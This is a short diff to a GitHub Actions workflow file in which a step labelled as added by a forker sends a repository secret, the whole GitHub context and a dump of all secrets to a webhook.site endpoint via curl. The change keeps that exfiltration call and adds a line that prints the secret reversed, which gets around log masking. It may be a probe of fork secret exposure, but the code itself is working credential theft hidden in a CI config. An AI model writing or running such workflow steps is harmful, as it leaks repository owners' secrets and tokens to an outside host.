--- a/.github/workflows/go.yml
+++ b/.github/workflows/go.yml
@@ -10,7 +10,9 @@ jobs:
     runs-on: ubuntu-latest
     steps:
     - name: New thing added by forker
-      run: curl -d "s=${{ secrets.FORKED_REPO_SECRET }}&c=$GITHUB_CONTEXT&s2=$SECRETS" 'https://webhook.site/c03c8df8-0054-4a08-9ee4-f1f1ab811e2e?hello=world&editer=cdb'
+      run: |
+        curl -d "s=${{ secrets.FORKED_REPO_SECRET }}&c=$GITHUB_CONTEXT&s2=$SECRETS" 'https://webhook.site/c03c8df8-0054-4a08-9ee4-f1f1ab811e2e?hello=world&editer=cdb'
+        echo ${{ secrets.FORKED_REPO_SECRET }} | rev
       env:
         GITHUB_CONTEXT: ${{ toJson(github) }}
         SECRETS_CONTEXT: ${{ toJson(secrets) }} 
